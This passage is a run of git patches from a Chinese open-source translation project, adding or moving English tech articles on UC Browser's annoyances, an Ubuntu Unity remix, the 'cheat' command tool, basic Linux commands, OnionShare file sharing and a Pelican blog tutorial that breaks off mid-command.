recommendation. But in the past 1 year or so, I +have seen some changes that have made me rethink about my choice and now I +feel like migrating back to chrome again. + +### The Unwanted **Notifications** + +I am sure I am not the only one who gets these unwanted notifications every +few hours. These clickbait articles are a real pain and the worst part is that +you get them every few hours. + +[![uc browser's annoying ads notifications][1]][1] + +I tried closing them down from the notification settings but they still kept +appearing with a less frequency. + +### The **News Homepage** + +Another unwanted section that is completely useless. We completely understand +that UC browser is free to download and it may require funding but this is not +the way to do it. The homepage features news articles that are extremely +distracting and unwanted. Sometimes when you are in a professional or family +environment some of these click baits might even cause awkwardness. + +[![uc browser's embarrassing news homepage][2]][2] + +And they even have a setting for that. To Turn the **UC** **News Display ON / +OFF.** And guess what, I tried that too **.** In the image below, You can see +my efforts on the left-hand side and the output on the right-hand side.[![uc +browser homepage settings][3]][3] + +And click bait news isn't enough, they have started adding some unnecessary +features. So let's include them as well. + +### UC **Music** + +UC browser integrated a **music player** in their browser to play music. It 's +just something that works, nothing too fancy. So why even have it? What's the +point? Who needs a music player in their browsers? + +[![uc browser adds uc music player][4]][4] + +It's not even like it will play audio from the web directly via that player in +the background. Instead, it is a music player that plays offline music. So why +have it? I mean it is not even good enough to be used as a primary music +player. Even if it was, it doesn't run independently of UC Browser. So why +would someone have his/her browser running just to use your Music Player? + +### The **Quick** Access Bar + +I have seen 9 out of 10 average users have this bar hanging around in their +notification area because it comes default with the installation and they +don't know how to get rid of it. The settings on the right get the job done. + +[![uc browser annoying quick access bar][5]][5] + +But I still wanna ask, "Why does it come by default ?". It's a headache for +most users. If we want it we will enable it. Why forcing the users though. + +### Conclusion + +UC browser is still one of the top players in the game. It provides one of the +best experiences, however, I am not sure what UC is trying to prove by packing +more and more unwanted features in their browser and forcing the user to use +them. + +I have loved UC for its speed and design. But recent experiences have led to +me having a second thought about my primary browser. + + + +-------------------------------------------------------------------------------- + +via: https://www.theitstuff.com/biggest-problems-uc-browser + +作者:[Rishabh Kandari][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.theitstuff.com/author/reevkandari +[1]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-6.png +[2]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-1-1.png +[3]:http://www.theitstuff.com/wp-content/uploads/2017/12/uceffort.png +[4]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-3-1.png +[5]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-4-1.png + From d4e353411a16f48d2a7a968eb8e1ceb8ddc5e9db Mon Sep 17 00:00:00 2001 From: geekpi Date: Wed, 13 Dec 2017 08:47:14 +0800 Subject: [PATCH 0516/1627] translated --- ...Unity from the Dead as an Official Spin.md | 43 ------------------- ...Unity from the Dead as an Official Spin.md | 41 ++++++++++++++++++ 2 files changed, 41 insertions(+), 43 deletions(-) delete mode 100644 sources/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md create mode 100644 translated/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md diff --git a/sources/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md b/sources/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md deleted file mode 100644 index d50a3cdfc5..0000000000 --- a/sources/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md +++ /dev/null @@ -1,43 +0,0 @@ -translating---geekpi - -Someone Tries to Bring Back Ubuntu's Unity from the Dead as an Official Spin -============================================================ - - - -> The Ubuntu Unity remix would be supported for nine months - -Canonical's sudden decision of killing its Unity user interface after seven years affected many Ubuntu users, and it looks like someone now tries to bring it back from the dead as an unofficial spin. - -Long-time [Ubuntu][1] member Dale Beaudoin [ran a poll][2] last week on the official Ubuntu forums to take the pulse of the community and see if they are interested in an Ubuntu Unity Remix that would be released alongside Ubuntu 18.04 LTS (Bionic Beaver) next year and be supported for nine months or five years. - -Thirty people voted in the poll, with 67 percent of them opting for an LTS (Long Term Support) release of the so-called Ubuntu Unity Remix, while 33 percent voted for the 9-month supported release. It also looks like this upcoming Ubuntu Unity Spin [looks to become an official flavor][3], yet this means commitment from those developing it. - -"A recent poll voted 2/3rds in favor of Ubuntu Unity to become an LTS distribution. We should try to work this cycle assuming that it will be LTS and an official flavor," said Dale Beaudoin. "We will try and release an updated ISO once every week or 10 days using the current 18.04 daily builds of default Ubuntu Bionic Beaver as a platform." - -### Is Ubuntu Unity making a comeback? - -The last Ubuntu version to ship with Unity by default was Ubuntu 17.04 (Zesty Zapus), which will reach end of life on January 2018\. Ubuntu 17.10 (Artful Artful), the current stable release of the popular operating system, is the first to use the GNOME desktop environment by default for the main Desktop edition as Canonical CEO [announced][4] earlier this year that Unity would no longer be developed. - -However, Canonical is still offering the Unity desktop environment from the official software repositories, so if someone wants to install it, it's one click away. But the bad news is that they'll be supported up until the release of Ubuntu 18.04 LTS (Bionic Beaver) in April 2018, so the developers of the Ubuntu Unity Remix would have to continue to keep in on life support on their a separate repository. - -On the other hand, we don't believe Canonical will change their mind and accept this Ubuntu Unity Spin to become an official flavor, which would mean they failed to continue development of Unity, and now a handful of people can do it. Most probably, if interest in this Ubuntu Unity Remix won't fade away soon, it will be an unofficial spin supported by the nostalgic community. - -Question is, would you be interested in an Ubuntu Unity spin, official or not? - --------------------------------------------------------------------------------- - -via: http://news.softpedia.com/news/someone-tries-to-bring-back-ubuntu-s-unity-from-the-dead-as-an-unofficial-spin-518778.shtml - -作者:[Marius Nestor ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://news.softpedia.com/editors/browse/marius-nestor -[1]:http://linux.softpedia.com/downloadTag/Ubuntu -[2]:https://community.ubuntu.com/t/poll-unity-7-distro-9-month-spin-or-lts-for-18-04/2066 -[3]:https://community.ubuntu.com/t/unity-maintenance-roadmap/2223 -[4]:http://news.softpedia.com/news/canonical-to-stop-developing-unity-8-ubuntu-18-04-lts-ships-with-gnome-desktop-514604.shtml -[5]:http://news.softpedia.com/editors/browse/marius-nestor diff --git a/translated/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md b/translated/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md new file mode 100644 index 0000000000..6bbb37ae57 --- /dev/null +++ b/translated/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md @@ -0,0 +1,41 @@ +有人试图将 Ubuntu Unity 非正式地从死亡带回来 +============================================================ + + + +> Ubuntu Unity Remix 将支持九个月 + +Canonical 在七年之后突然决定抛弃它的 Unity 用户界面影响了许多 Ubuntu 用户,看起来有人现在试图非正式地把它从死亡中带回来。 + +长期 [Ubuntu][1] 成员 Dale Beaudoin 上周在官方的 Ubuntu 论坛上[进行了一项调查][2]来了解社区,看看他们是否对明年发布的 Ubuntu 18.04 LTS(Bionic Beaver)的 Ubuntu Unity Remix 感兴趣,它将支持 9 个月或 5 年。 + +有 30 人进行了投票,其中 67% 的人选择了所谓的 Ubuntu Unity Remix 的 LTS(长期支持)版本,33% 的人投票支持 9 个月的支持版本。它也看起来像即将到来的 Ubuntu Unity Spin [看起来会成为官方版本][3],但这不意味着开发它的承诺。 + +Dale Beaudoin 表示:“最近的一项民意调查显示,2/3 的人支持 Ubuntu Unity 成为 LTS 发行版,我们应该尝试这个循环,假设它将是 LTS 和官方的风格。“我们将尝试使用当前默认的 Ubuntu Bionic Beaver 18.04 的每日版本作为平台每周或每 10 天发布一次更新的 ISO。” + +### Ubuntu Unity 是否会卷土重来? + +默认情况下,最后一个带有 Unity 的 Ubuntu 版本是 Ubuntu 17.04(Zesty Zapus),它将在 2018 年 1 月终止支持。当前流行操作系统的稳定版本 Ubuntu 17.10(Artful Artful),是今年早些时候 Canonical CEO [宣布][4]之后第一个默认使用 GNOME 桌面环境的版本,Unity 将不再开发。 + +然而,Canonical 仍然从官方软件仓库提供 Unity 桌面环境,所以如果有人想要安装它,只需点击一下即可。但坏消息是,它们支持到 2018 年 4 月发布 Ubuntu 18.04 LTS(Bionic Beaver)之前,所以 Ubuntu Unity Remix 的开发者们将不得不在独立的仓库中继续支持。 + +另一方面,我们不相信 Canonical 会改变主意,接受这个 Ubuntu Unity Spin 成为官方的风格,这意味着他们无法继续开发 Unity,现在只有一小部分人可以做到这一点。最有可能的是,如果对 Ubuntu Unity Remix 的兴趣没有很快消失,那么,这可能会是一个由怀旧社区支持的非官方版本。 + +问题是,你会对 你会对Ubuntu Unity Spin 感兴趣么,官方或者非官方? + +-------------------------------------------------------------------------------- + +via: http://news.softpedia.com/news/someone-tries-to-bring-back-ubuntu-s-unity-from-the-dead-as-an-unofficial-spin-518778.shtml + +作者:[Marius Nestor ][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://news.softpedia.com/editors/browse/marius-nestor +[1]:http://linux.softpedia.com/downloadTag/Ubuntu +[2]:https://community.ubuntu.com/t/poll-unity-7-distro-9-month-spin-or-lts-for-18-04/2066 +[3]:https://community.ubuntu.com/t/unity-maintenance-roadmap/2223 +[4]:http://news.softpedia.com/news/canonical-to-stop-developing-unity-8-ubuntu-18-04-lts-ships-with-gnome-desktop-514604.shtml +[5]:http://news.softpedia.com/editors/browse/marius-nestor From 8aa7c77147abf457e999115e3db0b2e0e9565c01 Mon Sep 17 00:00:00 2001 From: geekpi Date: Wed, 13 Dec 2017 08:50:14 +0800 Subject: [PATCH 0517/1627] translating --- ...0171115 Security Jobs Are Hot Get Trained and Get Noticed.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md b/sources/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md index a0a6b1ed60..002477680c 100644 --- a/sources/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md +++ b/sources/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md @@ -1,3 +1,5 @@ +translating---geekpi + Security Jobs Are Hot: Get Trained and Get Noticed ============================================================ From 24f2439455e0e933848c55da3ac1cee249af127a Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 13 Dec 2017 09:51:59 +0800 Subject: [PATCH 0518/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Cheat=20?= =?UTF-8?q?=E2=80=93=20A=20Collection=20Of=20Practical=20Linux=20Command?= =?UTF-8?q?=20Examples?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ction Of Practical Linux Command Examples.md | 195 ++++++++++++++++++ 1 file changed, 195 insertions(+) create mode 100644 sources/tech/20171213 Cheat – A Collection Of Practical Linux Command Examples.md diff --git a/sources/tech/20171213 Cheat – A Collection Of Practical Linux Command Examples.md b/sources/tech/20171213 Cheat – A Collection Of Practical Linux Command Examples.md new file mode 100644 index 0000000000..3e82106ade --- /dev/null +++ b/sources/tech/20171213 Cheat – A Collection Of Practical Linux Command Examples.md @@ -0,0 +1,195 @@ +Cheat – A Collection Of Practical Linux Command Examples +====== +Many of us very often checks **[Man Pages][1]** to know about command switches +(options), it shows you the details about command syntax, description, +details, and available switches but it doesn 't has any practical examples. +Hence, we are face some trouble to form a exact command format which we need. + +Are you really facing the trouble on this and want a better solution? i would +advise you to check about cheat utility. + +#### What Is Cheat + +[Cheat][2] allows you to create and view interactive cheatsheets on the +command-line. It was designed to help remind *nix system administrators of +options for commands that they use frequently, but not frequently enough to +remember. + +#### How to Install Cheat + +Cheat package was developed using python, so install pip package to install +cheat on your system. + +For **`Debian/Ubuntu`** , use [apt-get command][3] or [apt command][4] to +install pip. + +``` + + [For Python2] + + + $ sudo apt install python-pip python-setuptools + + + + [For Python3] + + + $ sudo apt install python3-pip + +``` + +pip doesn't shipped with **`RHEL/CentOS`** system official repository so, +enable [EPEL Repository][5] and use [YUM command][6] to install pip. + +``` + + $ sudo yum install python-pip python-devel python-setuptools + +``` + +For **`Fedora`** system, use [dnf Command][7] to install pip. + +``` + + [For Python2] + + + $ sudo dnf install python-pip + + + + [For Python3] + + + $ sudo dnf install python3 + +``` + +For **`Arch Linux`** based systems, use [Pacman Command][8] to install pip. + +``` + + [For Python2] + + + $ sudo pacman -S python2-pip python-setuptools + + + + [For Python3] + + + $ sudo pacman -S python-pip python3-setuptools + +``` + +For **`openSUSE`** system, use [Zypper Command][9] to install pip. + +``` + + [For Python2] + + + $ sudo pacman -S python-pip + + + + [For Python3] + + + $ sudo pacman -S python3-pip + +``` + +pip is a python module bundled with setuptools, it's one of the recommended +tool for installing Python packages in Linux. + +``` + + $ sudo pip install cheat + +``` + +#### How to Use Cheat + +Run `cheat` followed by corresponding `command` to view the cheatsheet, For +demonstration purpose, we are going to check about `tar` command examples. + +``` + + $ cheat tar + # To extract an uncompressed archive: + tar -xvf /path/to/foo.tar + + # To create an uncompressed archive: + tar -cvf /path/to/foo.tar /path/to/foo/ + + # To extract a .gz archive: + tar -xzvf /path/to/foo.tgz + + # To create a .gz archive: + tar -czvf /path/to/foo.tgz /path/to/foo/ + + # To list the content of an .gz archive: + tar -ztvf /path/to/foo.tgz + + # To extract a .bz2 archive: + tar -xjvf /path/to/foo.tgz + + # To create a .bz2 archive: + tar -cjvf /path/to/foo.tgz /path/to/foo/ + + # To extract a .tar in specified Directory: + tar -xvf /path/to/foo.tar -C /path/to/destination/ + + # To list the content of an .bz2 archive: + tar -jtvf /path/to/foo.tgz + + # To create a .gz archive and exclude all jpg,gif,... from the tgz + tar czvf /path/to/foo.tgz --exclude=\*.{jpg,gif,png,wmv,flv,tar.gz,zip} /path/to/foo/ + + # To use parallel (multi-threaded) implementation of compression algorithms: + tar -z ... -> tar -Ipigz ... + tar -j ... -> tar -Ipbzip2 ... + tar -J ... -> tar -Ipixz ... + +``` + +Run the following command to see what cheatsheets are available. + +``` + + $ cheat -l + +``` + +Navigate to help page for more details. + +``` + + $ cheat -h + +``` + + +-------------------------------------------------------------------------------- + +via: https://www.2daygeek.com/cheat-a-collection-of-practical-linux-command-examples/ + +作者:[Magesh Maruthamuthu][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.2daygeek.com +[1]:https://www.2daygeek.com/linux-color-man-pages-configuration-less-most-command/ +[2]:https://github.com/chrisallenlane/cheat +[3]:https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/ +[4]:https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/ +[5]:https://www.2daygeek.com/install-enable-epel-repository-on-rhel-centos-scientific-linux-oracle-linux/ +[6]:https://www.2daygeek.com/yum-command-examples-manage-packages-rhel-centos-systems/ +[7]:https://www.2daygeek.com/dnf-command-examples-manage-packages-fedora-system/ +[8]:https://www.2daygeek.com/pacman-command-examples-manage-packages-arch-linux-system/ +[9]:https://www.2daygeek.com/zypper-command-examples-manage-packages-opensuse-system/ From fd368e42baf07cef1ab596bd021c72b15ed78ee9 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 13 Dec 2017 10:05:13 +0800 Subject: [PATCH 0519/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Useful=20Linux?= =?UTF-8?q?=20Commands=20that=20you=20should=20know?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ful Linux Commands that you should know.md | 263 ++++++++++++++++++ 1 file changed, 263 insertions(+) create mode 100644 sources/tech/20170910 Useful Linux Commands that you should know.md diff --git a/sources/tech/20170910 Useful Linux Commands that you should know.md b/sources/tech/20170910 Useful Linux Commands that you should know.md new file mode 100644 index 0000000000..6dcd34c941 --- /dev/null +++ b/sources/tech/20170910 Useful Linux Commands that you should know.md @@ -0,0 +1,263 @@ +Useful Linux Commands that you should know +====== +If you are Linux system administrator or just a Linux enthusiast/lover, than +you love & use command line aks CLI. Until some years ago majority of Linux +work was accomplished using CLI only & even there are some limitations to GUI +. Though there are plenty of Linux distributions that can complete tasks with +GUI but still learning CLI is major part of mastering Linux. + +To this effect, we present you list of useful Linux commands that you should +know. + + **Note:-** There is no definite order to all these commands & all of these +commands are equally important to learn & master in order to excel in Linux +administration. One more thing, we have only used some of the options for each +command for an example, you can refer to 'man pages' for complete list of +options for each command. + +### 1- top command + +'top' command displays the real time summary/information of our system. It +also displays the processes and all the threads that are running & are being +managed by the system kernel. + +Information provided by top command includes uptime, number of users, Load +average, running/sleeping/zombie processes, CPU usage in percentage based on +users/system etc, system memory free & used, swap memory etc. + +To use top command, open terminal & execute the comamnd, + + **$ top** + +To exit out the command, either press 'q' or 'ctrl+c'. + +### 2- free command + +'free' command is used to specifically used to get the information about +system memory or RAM. With this command we can get information regarding +physical memory, swap memory as well as system buffers. It provided amount of +total, free & used memory available on the system. + +To use this utility, execute following command in terminal + + **$ free** + +It will present all the data in kb or kilobytes, for megabytes use options +'-m' & '-g ' for gb. + +#### 3- cp command + +'cp' or copy command is used to copy files among the folders. Syntax for using +'cp' command is, + + **$ cp source destination** + +### 4- cd command + +'cd' command is used for changing directory . We can switch among directories +using cd command. + +To use it, execute + + **$ cd directory_location** + +### 5- ifconfig + +'Ifconfig' is very important utility for viewing & configuring network +information on Linux machine. + +To use it, execute + + **$ ifconfig** + +This will present the network information of all the networking devices on the +system. There are number of options that can be used with 'ifconfig' for +configuration, in fact they are some many options that we have created a +separate article for it ( **Read it here ||[IFCONFIG command : Learn with some +examples][1]** ). + +### 6- crontab command + +'Crontab' is another important utility that is used schedule a job on Linux +system. With crontab, we can make sure that a command or a script is executed +at the pre-defined time. To create a cron job, run + + **$ crontab -e** + +To display all the created jobs, run + + **$ crontab -l** + +You can read our detailed article regarding crontab ( **Read it here ||[ +Scheduling Important Jobs with Crontab][2]** ) + +### 7- cat command + +'cat' command has many uses, most common use is that it's used to display +content of a file, + + **$ cat file.txt** + +But it can also be used to merge two or more file using the syntax below, + + **$ cat file1 file2 file3 file4 > file_new** + +We can also use 'cat' command to clone a whole disk ( **Read it here || +[Cloning Disks using dd & cat commands for Linux systems][3]** ) + +### 8- df command + +'df' command is used to show the disk utilization of our whole Linux file +system. Simply run. + + **$ df** + +& we will be presented with disk complete utilization of all the partitions on +our Linux machine. + +### 9- du command + +'du' command shows the amount of disk that is being utilized by the files & +directories on our Linux machine. To run it, type + + **$ du /directory** + +( **Recommended Read :[Use of du & df commands with examples][4]** ) + +### 10- mv command + +'mv' command is used to move the files or folders from one location to +another. Command syntax for moving the files/folders is, + + **$ mv /source/filename /destination** + +We can also use 'mv' command to rename a file/folder. Syntax for changing name +is, + + **$ mv file_oldname file_newname** + +### 11- rm command + +'rm' command is used to remove files\folders from Linux system. To use it, run + + **$ rm filename** + +We can also use '-rf' option with 'rm' command to completely remove a +file\folder from the system but we must use this with caution. + +### 12- vi/vim command + +VI or VIM is very famous & one of the widely used CLI-based text editor for +Linux. It takes some time to master it but it has a great number of utilities, +which makes it a favorite for Linux users. + +For detailed knowledge of VIM, kindly refer to the articles [**Beginner 's +Guide to LVM (Logical Volume Management)** & **Working with Vi/Vim Editor : +Advanced concepts.**][5] + +### 13- ssh command + +SSH utility is to remotely access another machine from the current Linux +machine. To access a machine, execute + + **$ ssh[[email protected]][6] OR machine_name** + +Once we have remote access to machine, we can work on CLI of that machine as +if we are working on local machine. + +### 14- tar command + +'tar' command is used to compress & extract the files\folders. To compress the +files\folders using tar, execute + + **$ tar -cvf file.tar file_name** + +where file.tar will be the name of compressed folder & 'file_name' is the name +of source file or folders. To extract a compressed folder, + + **$ tar -xvf file.tar** + +For more details on 'tar' command, read [**Tar command : Compress & Decompress +the files\directories**][7] + +### 15- locate command + +'locate' command is used to locate files & folders on your Linux machines. To +use it, run + + **$ locate file_name** + +### 16- grep command + +'grep' command another very important command that a Linux administrator +should know. It comes especially handy when we want to grab a keyword or +multiple keywords from a file. Syntax for using it is, + + **$ grep 'pattern' file.txt** + +It will search for 'pattern' in the file 'file.txt' and produce the output on +the screen. We can also redirect the output to another file, + + **$ grep 'pattern' file.txt > newfile.txt** + +### 17- ps command + +'ps' command is especially used to get the process id of a running process. To +get information of all the processes, run + + **$ ps -ef** + +To get information regarding a single process, executed + + **$ ps -ef | grep java** + +### 18- kill command + +'kill' command is used to kill a running process. To kill a process we will +need its process id, which we can get using above 'ps' command. To kill a +process, run + + **$ kill -9 process_id** + +### 19- ls command + +'ls' command is used list all the files in a directory. To use it, execute + + **$ ls** + +### 20- mkdir command + +To create a directory in Linux machine, we use command 'mkdir'. Syntax for +using 'mkdir' is + + **$ mkdir new_dir** + +These were some of the useful linux commands that every System Admin should +know, we will soon be sharing another list of some more important commands +that you should know being a Linux lover. You can also leave your suggestions +and queries in the comment box below. + + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/useful-linux-commands-you-should-know/ + +作者:[][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com +[1]:http://linuxtechlab.com/ifconfig-command-learn-examples/ +[2]:http://linuxtechlab.com/scheduling-important-jobs-crontab/ +[3]:http://linuxtechlab.com/linux-disk-cloning-using-dd-cat-commands/ +[4]:http://linuxtechlab.com/du-df-commands-examples/ +[5]:http://linuxtechlab.com/working-vivim-editor-advanced-concepts/ +[6]:/cdn-cgi/l/email-protection#bbcec8dec9d5dad6defbf2ebdadfdfc9dec8c8 +[7]:http://linuxtechlab.com/tar-command-compress-decompress-files +[8]:https://www.facebook.com/linuxtechlab/ +[9]:https://twitter.com/LinuxTechLab +[10]:https://plus.google.com/+linuxtechlab +[11]:http://linuxtechlab.com/contact-us-2/ + From 1c0cda3a5789e3cd8798f7fc11e63b56782e9643 Mon Sep 17 00:00:00 2001 From: DarkSun Date: Wed, 13 Dec 2017 10:08:57 +0800 Subject: [PATCH 0520/1627] =?UTF-8?q?update=20=E8=AF=91=E8=80=85id?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Zombie Processes And How To Find & Kill Zombie Processes-.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/translated/tech/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md b/translated/tech/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md index 79e13fcc01..72acbcf558 100644 --- a/translated/tech/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md +++ b/translated/tech/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md @@ -68,7 +68,7 @@ kill -s SIGCHLD pid via: http://www.linuxandubuntu.com/home/what-are-zombie-processes-and-how-to-find-kill-zombie-processes 作者:[linuxandubuntu][a] -译者:[译者ID](https://github.com/译者ID) +译者:[lujun9972](https://github.com/lujun9972) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 6411499e2d150c822d2adacd39279157fe13c344 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 13 Dec 2017 11:17:25 +0800 Subject: [PATCH 0521/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20OnionShare=20-?= =?UTF-8?q?=20Share=20Files=20Anonymously?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...08 OnionShare - Share Files Anonymously.md | 77 +++++++++++++++++++ 1 file changed, 77 insertions(+) create mode 100644 sources/tech/20171208 OnionShare - Share Files Anonymously.md diff --git a/sources/tech/20171208 OnionShare - Share Files Anonymously.md b/sources/tech/20171208 OnionShare - Share Files Anonymously.md new file mode 100644 index 0000000000..bc42a009c5 --- /dev/null +++ b/sources/tech/20171208 OnionShare - Share Files Anonymously.md @@ -0,0 +1,77 @@ +OnionShare - Share Files Anonymously +====== +In this Digital World, we share our media, documents, important files via the Internet using different cloud storage like Dropbox, Mega, Google Drive and many more. But every cloud storage comes with two major problems, one is the Size and the other Security. After getting used to Bit Torrent the size is not a matter anymore, but the security is. + +Even though you send your files through the secure cloud services they will be noted by the company, if the files are confidential, even the government can have them. So to overcome these problems we use OnionShare, as per the name it uses the Onion internet i.e Tor to share files Anonymously to anyone. + +### How to Use **OnionShare**? + + * First Download the [OnionShare][1] and [Tor Browser][2]. After downloading install both of them. + + + +[![install onionshare and tor browser][3]][3] + + * Now open OnionShare from the start menu + + + +[![onionshare share files anonymously][4]][4] + + * Click on Add and add a File/Folder to share. + * Click start sharing. It produces a .onion URL, you could share the URL with your recipient. + + + +[![share file with onionshare anonymously][5]][5] + + * To Download file from the URL, copy the URL and open Tor Browser and paste it. Open the URL and download the Files/Folder. + + + +[![receive file with onionshare anonymously][6]][6] + +### Start of **OnionShare** + +A few years back when Glenn Greenwald found that some of the NSA documents which he received from Edward Snowden had been corrupted. But he needed the documents and decided to get the files by using a USB. It was not successful. + +After reading the book written by Greenwald, Micah Lee crypto expert at The Intercept, released the OnionShare - simple, free software to share files anonymously and securely. He created the program to share big data dumps via a direct channel encrypted and protected by the anonymity software Tor, making it hard to get the files for the eavesdroppers. + +### How Does **OnionShare** Work? + +OnionShare starts a web server at 127.0.0.1 for sharing the file on a random port. It chooses any of two words from the wordlist of 6800-wordlist called slug. It makes the server available as Tor onion service to send the file. The final URL looks like: + +`http://qx2d7lctsnqwfdxh.onion/subside-durable` + +The OnionShare shuts down after downloading. There is an option to allow the files to be downloaded multiple times. This makes the file not available on the internet anymore. + +### Advantages of using **OnionShare** + +Other Websites or Applications have access to your files: The file the sender shares using OnionShare is not stored on any server. It is directly hosted on the sender's system. + +No one can spy on the shared files: As the connection between the users is encrypted by the Onion service and Tor Browser. This makes the connection secure and hard to eavesdroppers to get the files. + +Both users are Anonymous: OnionShare and Tor Browser make both sender and recipient anonymous. + +### Conclusion + +In this article, I have explained how to **share your documents, files anonymously**. I also explained how it works. Hope you have understood how OnionShare works, and if you still have a doubt regarding anything, just drop in a comment. + + +-------------------------------------------------------------------------------- + +via: https://www.theitstuff.com/onionshare-share-files-anonymously-2 + +作者:[Anirudh Rayapeddi][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.theitstuff.com +[1]https://onionshare.org/ +[2]https://www.torproject.org/projects/torbrowser.html.en +[3]http://www.theitstuff.com/wp-content/uploads/2017/12/Icons.png +[4]http://www.theitstuff.com/wp-content/uploads/2017/12/Onion-Share.png +[5]http://www.theitstuff.com/wp-content/uploads/2017/12/With-Link.png +[6]http://www.theitstuff.com/wp-content/uploads/2017/12/Tor.png From b9fd51c06e05a3bfeb1f614b023bf5975b10b9a2 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 13 Dec 2017 11:22:27 +0800 Subject: [PATCH 0522/1627] =?UTF-8?q?update=20at=202017=E5=B9=B4=2012?= =?UTF-8?q?=E6=9C=88=2013=E6=97=A5=20=E6=98=9F=E6=9C=9F=E4=B8=89=2011:22:2?= =?UTF-8?q?7=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ng a blog with pelican and Github pages.md | 364 ++++++++++++++++++ 1 file changed, 364 insertions(+) create mode 100644 sources/tech/20171213 Creating a blog with pelican and Github pages.md diff --git a/sources/tech/20171213 Creating a blog with pelican and Github pages.md b/sources/tech/20171213 Creating a blog with pelican and Github pages.md new file mode 100644 index 0000000000..a50494e0ac --- /dev/null +++ b/sources/tech/20171213 Creating a blog with pelican and Github pages.md @@ -0,0 +1,364 @@ +Creating a blog with pelican and Github pages +====== +# Creating a blog with pelican and Github pages +~ 5 min read +ter 05 dezembro 2017 in +in [blog][1] +Today I'm going to talk about how this blog was created. Before we begin, I expect you to be familiarized with using Github and creating a Python virtual enviroment to develop. If you aren't, I recommend you to learn with the [Django Girls tutorial][2], which covers that and more. +This is a tutorial to help you publish a personal blog hosted by Github. For that, you will need a regular Github user account (instead of a project account). +The first thing you will do is to create the Github repository where your code will live. If you want your blog to point to only your username (like rsip22.github.io) instead of a subfolder (like rsip22.github.io/blog), you have to create the repository with that full name. +![Screenshot of Github, the menu to create a new repository is open and a new repo is being created with the name 'rsip22.github.io'][3] +I recommend that you initialize your repository with a README, with a .gitignore for Python and with a [free software license][4]. If you use a free software license, you still own the code, but you make sure that others will benefit from it, by allowing them to study it, reuse it and, most importantly, keep sharing it. +Now that the repository is ready, let's clone it to the folder you will be using to store the code in your machine: +``` + $ git clone https://github.com/YOUR_USERNAME/YOUR_USERNAME.github.io.git + +``` +And change to the new directory: +``` + $ + cd + YOUR_USERNAME.github.io + +``` +Because of how Github Pages prefers to work, serving the files from the master branch, you have to put your source code in a new branch, preserving the "master" for the output of the static files generated by Pelican. To do that, you must create a new branch called "source": +``` + $ git checkout -b + source + + +``` +Create the virtualenv with the Python3 version installed on your system. +On GNU/Linux systems, the command might go as: +``` + $ python3 -m 